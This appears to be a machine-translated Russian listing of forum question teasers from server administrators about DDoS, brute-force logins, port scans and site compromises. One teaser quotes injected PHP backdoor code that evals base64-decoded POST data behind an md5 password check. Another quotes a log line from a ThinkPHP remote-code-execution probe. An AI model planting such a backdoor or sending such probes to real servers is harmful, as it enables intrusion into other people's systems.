1
ответ
Атаки с удаленным выполнением кода
Возможно, это очень глупый вопрос, но я хотел бы получить подтверждение.
Я нашел такие строки, как
93.71.247.71 - - [19/Jan/2021:17:37:59 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&...
вопрос задан: 19 January 2021 18:49
1
ответ
Значение файла журнала (DDOS) [дубликат]
В настоящее время мы сталкиваемся с атаками (вероятно, DDOS) на наш сервер. Входящий сетевой трафик в среднем увеличивается с 20 Мбит / с до 1 Гбит / с всего за 2-3 минуты. Строки в наших файлах журнала обычно выглядят так:
...
вопрос задан: 25 November 2020 10:25
1
ответ
Это настоящий Google-бот или атака? Как мне с этим справиться?
Так что в основном мой сайт был недоступен, и я пошел в папку журналов, чтобы посмотреть, что не так, и заметил много странных запросов с разных IP-адресов: 155.4.117.13 - - [30 / Mar / 2020: 20 : 23: 45 +0300] "GET / HTTP / 1.0" ...
вопрос задан: 30 March 2020 20:34
1
ответ
Перенаправление Nginx дает неожиданный ответ
Я использую Google вычислительный движок в качестве прокси-сервера с использованием nginx. Я делаю к нему несколько запросов POST, и он перенаправляет их на сторонний сервер. Проблема в том, что с сегодняшнего дня я начал получать неожиданные сообщени
вопрос задан: 5 February 2020 17:14
1
ответ
Windows RDP: Атака на реальные имена учетных записей
У нас есть сервер Windows 2012 R2, размещенный в центре обработки данных, и мы используем RDP для его администрирования. Включены автоматические обновления. Вход по RDP не разрешен для учетной записи администратора, и там ...
вопрос задан: 23 October 2019 10:15
1
ответ
Необычные совпадения в журнале Apache для сайта localhost
У меня есть веб-сервер Apache 2.2, работающий в Windows 7 с шестью настроенными виртуальными хостами. Доменное имя A указывает на?: /.../ urls / 1 /
Доменное имя B указывает на?: /.../ urls / 2 /
Доменное имя C + D указывает на?: /.../ urls / 3 / ...
вопрос задан: 26 June 2019 19:39
1
ответ
Подвержен ли я атаке ddos? Много случайных запросов (обычно к изображениям)
Выглядят ли подобные запросы как DDOS-атака? 180.157.250.126 /9301451791bb460e8a5aec3e123884ba.jpg <<< совпадение
180.157.250.126 /b29a2302afd6dfd918a2b7c3b6a05e31.jpg <<< совпадение
183 ....
вопрос задан: 8 April 2019 21:57
1
ответ
Подозрительные записи журнала ssh («Не принимаются для анонимных»)
Я получил эту цепочку записей журнала (и аналогичные неоднократно) на моем сервере: 24 ноября 07: 38:59 server sshd [28676]: SSH: Server; Ltype: Version; Remote: 54.38.81.12-40482; Protocol: 2.0; Client: OpenSSH_7.2p2 Ubuntu -...
вопрос задан: 26 November 2018 20:04
1
ответ
Хакер по внедрению блоков
У меня есть кто-то, кто внедряет мои файлы php со следующим кодом: if (md5 ($ _ POST ["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") {eval (base64_decode ($ _ POST ["cookies_p" ])); }
if (strpos ($ _ SERVER ['...
вопрос задан: 22 June 2018 14:37
1
ответ
Устранение 404-й бомбы с помощью Nginx
Я получил 404 запроса, и моя машина выйдет из строя. Почти все мои страницы кэшируются по протоколу http, и у меня есть базовая защита Dos с помощью limit_conn_zone $ http_x_forwarded_for zone = addr: 10m; ...
вопрос задан: 15 May 2018 18:38
1
ответ
Подозрительные журналы на ebs, это что-то вроде троянской атаки?
Я нашел множество похожих журналов в журналах облачных наблюдений, где потоковая передача журналов из моего приложения ebs. Я использую платформу: 64-битную Amazon Linux 2017.03 v2.5.0 под управлением Java 8 Вот журналы, которые ...
вопрос задан: 8 June 2017 11:34
1
ответ
Как выставить надежно сервер Node.js/Express в реальный мир?
По существу я хотел бы знать то, что предлагает заголовок. Node.js/Express хорош. Однако узел является довольно недавней вещью и следовательно могут быть угрозы безопасности путем воздействия сервера реального мира....
вопрос задан: 23 May 2017 15:41
1
ответ
Netscan обнаружен с хоста [дубликат]
Возможный дубликат: Мой сервер был взломан. АВАРИЙНАЯ СИТУАЦИЯ. Атаки Portscan откуда-то я использую выделенные серверы Hetzner. Сегодня я получил сообщение: Мы получили информацию о том, что ...
вопрос задан: 13 April 2017 15:14
1
ответ
Как бороться с этими косвенными атаками со стороны ботов Facebook и Google?
Наш сайт взломан ботами Google и Facebook: 66.249.90.50 - - [03 / Апрель / 2017: 09: 26: 41 +1000] "GET / news /? Vmowv = HTTP / 1.1" 200 48925 "-" "Mediapartners-Google"
66.249.90.49 - - [03 / Apr / 2017: 09: 26: 42 + ...
вопрос задан: 3 April 2017 02:47
1
ответ
Установка TMG только windows 2008 r2. НЕ РАБОТАЕТ windows server 2012 r2
TMG Forefront работает только windows server 2008 или 2008R2 - не работает windows server 2012. Как предотвратить windows server 2012R2 - flood-атаки, http-атаки? Пожалуйста, помогите, как собрать окна ...
вопрос задан: 2 March 2017 21:52
1
ответ
Отбросить первый пакет с iptables
Наши серверы подвергаются IP-атакам с использованием спуфинга UDP-флудом. Я думаю, мы можем решить эту проблему с помощью iptables, и я хочу создать правило с помощью iptables. Когда ip пытается отправить udp-пакет, iptables ...
вопрос задан: 29 January 2017 10:00
1
ответ
Странное соединение на ssh serer
Итак, однажды я решил проверить логи ssh-сервера. Так и сделал, и обнаружил что-то странное.
Было около 3 разных IP-адресов, пытающихся угадать пароль root? Что мне делать, если что?
PS: ...
вопрос задан: 30 October 2016 04:12
1
ответ
В чем законное использование пакета деаутентификации?
Большинство людей, злонамеренно взламывающих внешние беспроводные сети в целях образования (надеюсь, ваша собственная личная тестовая сеть), вероятно, слышали о деаутентификации ...
вопрос задан: 20 July 2016 01:22
1
ответ
На мой IP-адрес указан другой домен. [Closed]
Я только что сделал обычную обратную проверку IP. И увидел, что 2 домена указывают на мой IP. Это меня очень беспокоит, так как мне сказали, что они могут готовиться к атаке на мой сервер. Что именно ...
вопрос задан: 24 April 2016 17:14
1
ответ
На моем сервере обнаружены атаки сканирования портов [дубликат]
У меня есть выделенный сервер для моих личных проектов на Hetzner, и сегодня я второй раз получил от них электронное письмо, в котором сообщалось, что они обнаружили сканирование портов, исходящее с сервера (первый раз было в Январь). At ...
вопрос задан: 3 March 2016 10:44
1
ответ
Ошибки Apache 404 со словом «привет» как URL
Мой веб-сервер отправляет мне электронное письмо, если возникает ошибка 404 (чтобы помочь мне с отсутствующими ссылками). У меня были только обычные 404, такие как http://www.example.com/administrator и так далее. Но в последнее время все время спрашиваю
вопрос задан: 24 December 2015 18:58
1
ответ
Сервер, Заблокированный Поставщиком, Отправляющим Пакеты UDP в определенный IP - что это означает?
Мой веб-сервер был недавно заблокирован моим поставщиком по причине, что он выполнял нападение к другому серверу. Электронная почта содержала следующий журнал: 8:26:39.219940 68:05:ca:07:02:01> 78:fe:...
вопрос задан: 22 July 2015 00:54
1
ответ
Нападение сервера, но на Загрузке не Загрузка
Я в настоящее время подвергаюсь нападению на одном из моих серверов, но я изо всех сил пытаюсь узнать то, что могло вызывать его. У меня было несколько DDos-атак прежде, но это конкретное нападение, которое я не уверен что...
вопрос задан: 27 March 2015 17:57
1
ответ
Задача аудита веб-приложений требует, чтобы мой удаленный IP-адрес был разрешен в сетевом брандмауэре приложения [закрыто]
Я хочу проверить веб-приложение, которое размещено на веб-сервере, находящемся за брандмауэром cyberoam. Моя задача - запустить сканирование с моего удаленного компьютера, на котором есть широкополосный ISP MTNL. Моя машина получает ...
вопрос задан: 5 March 2015 10:18
1
ответ
Какой-либо способ заблокировать ответ DNS с помощью BIND?
Я использую BIND в качестве своего сервера DNS. Я отключил рекурсивный запрос DNS. Теперь я нахожусь под некоторым ударом. Есть ли, кто-либо должен был заблокировать это, или я должен позволить ему пойти? Мой журнал запросов: клиент 75.214.6....
вопрос задан: 2 March 2015 16:05
1
ответ
Что такое типичный уровень запроса в час в распределенном нападении?
Я обеспокоен, что некоторые статические файлы, размещенные публично в S3, могут быть целью нападения, которое имеет целью причинять мне боль в финансовом отношении (увеличивающий мои счета AWS). Я настроил систему регистрации, которая выполняет каждый...
вопрос задан: 17 February 2015 07:18
1
ответ
Как я защищаю блоги WordPress от использования Elemento_pcx?
У меня есть клиент, у которого есть несколько WordPress 2.9.2 блогов, которые он размещает. Они получают стирать вид взлома с использованием Elemento_pcx так или иначе. Это отбрасывает эти файлы в корневой папке блога:...
вопрос задан: 30 January 2015 02:50
1
ответ
Я вижу свой сайт полностью в другом домене [дубликат]
Сегодня я обнаружил, что один из моих сайтов полностью отображается в другом домене, который мне не принадлежит.
Это что-то вроде взлома DNS или что такое цель этих действий? Потому что я видел это раньше, несколько лет назад ...
вопрос задан: 14 December 2014 13:52
1
ответ
Другой домен указывает на мой веб-сервер
Кто-то еще зарегистрировал имя, указывающее на IP-адрес моего веб-сервера в .ma TLD. Мой домен foo.bar-> мой IP-адрес 1.2.3.4 Кто-то определил: suspiciousdomain.ma-> мой IP-адрес 1.2.3.4 Так...
вопрос задан: 11 April 2014 17:01
1
ответ
Сетевая атака на выделенный сервер [дубликат]
Я использую выделенный сервер для одного из своих проектов. Я получил письмо от поставщика сервера, что их система мониторинга обнаружила сканирование сети (или сетевую атаку) с IP-адреса. The ...
вопрос задан: 16 March 2014 21:50